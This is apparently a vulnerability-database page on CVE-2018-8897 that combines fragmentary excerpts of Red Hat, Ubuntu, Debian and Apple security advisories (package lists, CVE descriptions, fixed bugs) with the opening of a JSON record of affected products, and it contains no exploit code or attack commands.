x86_64: kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: kernel-2.6.32-696.28.1.el6.src.rpm

noarch: kernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm kernel-doc-2.6.32-696.28.1.el6.noarch.rpm kernel-firmware-2.6.32-696.28.1.el6.noarch.rpm

x86_64: kernel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm kernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm kernel-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-headers-2.6.32-696.28.1.el6.x86_64.rpm perf-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

x86_64: kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: kernel-2.6.32-696.28.1.el6.src.rpm

i386: kernel-2.6.32-696.28.1.el6.i686.rpm kernel-debug-2.6.32-696.28.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm kernel-devel-2.6.32-696.28.1.el6.i686.rpm kernel-headers-2.6.32-696.28.1.el6.i686.rpm perf-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm kernel-doc-2.6.32-696.28.1.el6.noarch.rpm kernel-firmware-2.6.32-696.28.1.el6.noarch.rpm

ppc64: kernel-2.6.32-696.28.1.el6.ppc64.rpm kernel-bootwrapper-2.6.32-696.28.1.el6.ppc64.rpm kernel-debug-2.6.32-696.28.1.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm kernel-debug-devel-2.6.32-696.28.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-696.28.1.el6.ppc64.rpm kernel-devel-2.6.32-696.28.1.el6.ppc64.rpm kernel-headers-2.6.32-696.28.1.el6.ppc64.rpm perf-2.6.32-696.28.1.el6.ppc64.rpm perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm

s390x: kernel-2.6.32-696.28.1.el6.s390x.rpm kernel-debug-2.6.32-696.28.1.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.s390x.rpm kernel-debug-devel-2.6.32-696.28.1.el6.s390x.rpm kernel-debuginfo-2.6.32-696.28.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-696.28.1.el6.s390x.rpm kernel-devel-2.6.32-696.28.1.el6.s390x.rpm kernel-headers-2.6.32-696.28.1.el6.s390x.rpm kernel-kdump-2.6.32-696.28.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-696.28.1.el6.s390x.rpm kernel-kdump-devel-2.6.32-696.28.1.el6.s390x.rpm perf-2.6.32-696.28.1.el6.s390x.rpm perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm

x86_64: kernel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm kernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm kernel-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-headers-2.6.32-696.28.1.el6.x86_64.rpm perf-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm

ppc64: kernel-debug-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-696.28.1.el6.ppc64.rpm perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm python-perf-2.6.32-696.28.1.el6.ppc64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm

s390x: kernel-debug-debuginfo-2.6.32-696.28.1.el6.s390x.rpm kernel-debuginfo-2.6.32-696.28.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-696.28.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-696.28.1.el6.s390x.rpm perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm python-perf-2.6.32-696.28.1.el6.s390x.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm

x86_64: kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: kernel-2.6.32-696.28.1.el6.src.rpm

i386: kernel-2.6.32-696.28.1.el6.i686.rpm kernel-debug-2.6.32-696.28.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm kernel-devel-2.6.32-696.28.1.el6.i686.rpm kernel-headers-2.6.32-696.28.1.el6.i686.rpm perf-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm kernel-doc-2.6.32-696.28.1.el6.noarch.rpm kernel-firmware-2.6.32-696.28.1.el6.noarch.rpm

x86_64: kernel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm kernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm kernel-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-headers-2.6.32-696.28.1.el6.x86_64.rpm perf-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2017-7645 https://access.redhat.com/security/cve/CVE-2017-8824 https://access.redhat.com/security/cve/CVE-2017-13166 https://access.redhat.com/security/cve/CVE-2017-18017 https://access.redhat.com/security/cve/CVE-2017-1000410 https://access.redhat.com/security/cve/CVE-2018-8897 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/3431591

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iD8DBQFa8fO8XlSAg2UNWIIRAnN0AKCBdjdw1bC12xju0GwoOedA1L8osACaA1Ze 4IKrbiFeHd+C9bqCjUFX4pw= =3psi -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Kernel Live Patch Security Notice LSN-0038-1 May 8, 2018

linux vulnerability

A security issue affects these releases of Ubuntu:

| Series | Base kernel | Arch | flavors | |------------------+--------------+----------+------------------| | Ubuntu 16.04 LTS | 4.4.0 | amd64 | generic | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | lowlatency | | Ubuntu 14.04 LTS | 4.4.0 | amd64 | generic | | Ubuntu 14.04 LTS | 4.4.0 | amd64 | lowlatency |

Summary:

On May 8, fixes for CVE-2018-1087 and CVE-2018-8897 were released in linux kernel version 4.4.0-124.148. These CVEs are both related to the way that the linux kernel handles certain interrupt and exception instructions. The issue can be triggered by an unprivileged user.

The fix for this problem requires modification of the interrupt descriptor tables (IDT), and modification of the interrupt handlers. Livepatch is unable to safely modify these areas, so upgrading to a corrected kernel and rebooting is required to fix the problem.

References: CVE-2018-1087, CVE-2018-8897

-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce . Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. (BZ#1549768)

CVE-2018-10471

An error was discovered in the mitigations against Meltdown which
could result in denial of service.

CVE-2018-10472

Anthony Perard discovered that incorrect parsing of CDROM images
can result in information disclosure.

CVE-2018-10981

Jan Beulich discovered that malformed device models could result
in denial of service.

CVE-2018-10982

Roger Pau Monne discovered that incorrect handling of high precision
event timers could result in denial of service and potentially
privilege escalation.

For the stable distribution (stretch), these problems have been fixed in version 4.8.3+comet2+shim4.10.0+comet3-1+deb9u6.

We recommend that you upgrade your xen packages.

For the detailed security status of xen please refer to its security tracker page at: https://security-tracker.debian.org/tracker/xen

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlr7PHoACgkQEMKTtsN8 TjbvyBAAqSJFsDcTo75hggE1faIttXR3UKOwJ4eSKbkf3G6/JnvotuO5z4bQXDBC XZfkL6kOTl579vmCGgCvBv/SrrPrJ1ibhrw+Dz1MIcjX4Yt9mb6NriWuMTObknca uw6qJakWZTB3tFcp3LlmN80B8lY/67XR8mQaZ4f0yHhGEfqIunEtSgLelmp5lLu2 M/m1iH9zQon3muhQiXiHJeMg1ghJ3xvFKbuEU9prih4NNinxquv0pmAzfbPCCBN6 E4cuEjArzdnwLydeWfCoLrFOZh5rvoMTmmK8gj2/KVlbC5YgJ5/xVlc89B4PaJKL m3oUV2dnLEpubC7uuXSOoejMnfbPcOGM4VYrmuIuxEfZZVNYE/NxvmNCZ+JDzQV7 Z939vOgyqyuojFFt7lgvoCWM2Q3xDRMrE9akK1KyAGmvyRzoczblw8N6dzL8sain gs5LUE/5dCJWQWv4IPz/V/nl50Lh+tYjbdVuZaiXxKYiqiWuCY0Ea+8QIb2UWGrk rC2BUYaoYBEo0vQhzBIi91E2hyQ+2Y6+zP6zTVTEA8PDw2YnfdffzydQ3Z9l4OSN IoTOojXPpMdcCSVzBC5OkvzBuQ6qzkVh3vftxajYazuiSrPJl8KenLJ6jFlpCzA3 p+140rFiElDCUkHacCmfs4zWQ+/ZLcoAppIxvxDEZYWyRJp3qgU= =KAUD -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

APPLE-SA-2018-05-08-1 Additional information for APPLE-SA-2018-04-24-2 Security Update 2018-001

Security Update 2018-001 addresses the following:

Crash Reporter Available for: macOS High Sierra 10.13.4 Impact: An application may be able to gain elevated privileges Description: A memory corruption issue was addressed with improved error handling. CVE-2018-4206: Ian Beer of Google Project Zero

Kernel Available for: macOS High Sierra 10.13.4 Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: In some circumstances, some operating systems may not expect or properly handle an Intel architecture debug exception after certain instructions. The issue appears to be from an undocumented side effect of the instructions. CVE-2018-8897: Andy Lutomirski, Nick Peterson (linkedin.com/in/everdox) of Everdox Tech LLC Entry added May 8, 2018

LinkPresentation Available for: macOS High Sierra 10.13.4 Impact: Processing a maliciously crafted text message may lead to UI spoofing Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.

Includes GlusterFS fixes for CVE-2018-1088, dhcp fixes for CVE-2018-1111, kernel fixes for CVE-2018-1087, and kernel fixes for CVE-2018-8897.

A list of bugs fixed in this update is available in the Technical Notes book: https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.2/ht ml/technical_notes/

  1. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):

1357247 - rhvh 4: reboot after install shows "4m[terminated]" and takes long to reboot 1374007 - [RFE] RHV-H does not default to LVM Thin Provisioning 1420068 - [RFE] RHV-H should meet NIST 800-53 partitioning requirements by default 1422676 - [Test Only] Test Ansible playbook for registration 1429485 - [RFE] Imgbased layers should be named with '%{name}-%{version}-%{release}' instead of %{name}-%{version} 1433394 - kdump could fill up /var filesystem while writing to /var/crash 1443965 - Libvirt is disabled on RHVH host 1454536 - HostedEngine setup fails if RHV-H timezone < UTC set during installation 1474268 - RHVH host displays "upgrade available" information on the engine after registering until an update is released 1489567 - Host Software tab does not show exact RHVH version anymore 1501161 - The version displays as "4.1" for subscribed product with RHVH 4.2 1502920 - File missing after upgrade of RHVH node from version RHVH-4.1-20170925.0 to latest. 1503148 - [RFE] translate between basic ntp configurations and chrony configurations 1516123 - tuned-adm timeout while adding the host in manager and the deployment will fail/take time to complete 1534855 - RHVH brand is missing on cockpit login screen.

Bug Fix(es):

  • The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines. The Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. (BZ#1554253)

  • 6.5) - x86_64

  • (BZ#1554256)

4

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201805-0950",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "citrix",
        "version": "7.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": null
      },
      {
        "model": "diskstation manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "synology",
        "version": "6.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "7.0"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "citrix",
        "version": "6.0.2"
      },
      {
        "model": "freebsd",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "11.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "citrix",
        "version": "6.2.0"
      },
      {
        "model": "diskstation manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "synology",
        "version": "6.0"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "citrix",
        "version": "7.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "diskstation manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "synology",
        "version": "5.2"
      },
      {
        "model": "enterprise virtualization manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "3.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "17.10"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "citrix",
        "version": "7.3"
      },
      {
        "model": "skynas",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "synology",
        "version": null
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "citrix",
        "version": "7.2"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "citrix",
        "version": "6.5"
      },
      {
        "model": "freebsd",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "11.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "mac os x",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.13.4"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "citrix",
        "version": "7.4"
      },
      {
        "model": "",
        "scope": null,
        "trust": 0.8,
        "vendor": "multiple vendors",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.8"
      },
      {
        "model": "11.1-release-p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.28"
      },
      {
        "model": "windows server r2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.7"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1"
      },
      {
        "model": "10.4-release-p8",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.7"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.1"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.38"
      },
      {
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.7"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.5"
      },
      {
        "model": "11.1-release-p4",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.12"
      },
      {
        "model": "dsm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "synology",
        "version": "6.1"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.64"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1018030"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.10"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "18030"
      },
      {
        "model": "kernel 4.10-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.105"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.9"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.125"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.11"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "8.10"
      },
      {
        "model": "windows rt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "8.1"
      },
      {
        "model": "windows server r2 for itanium-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.1"
      },
      {
        "model": "11.1-release-p7",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.3.0"
      },
      {
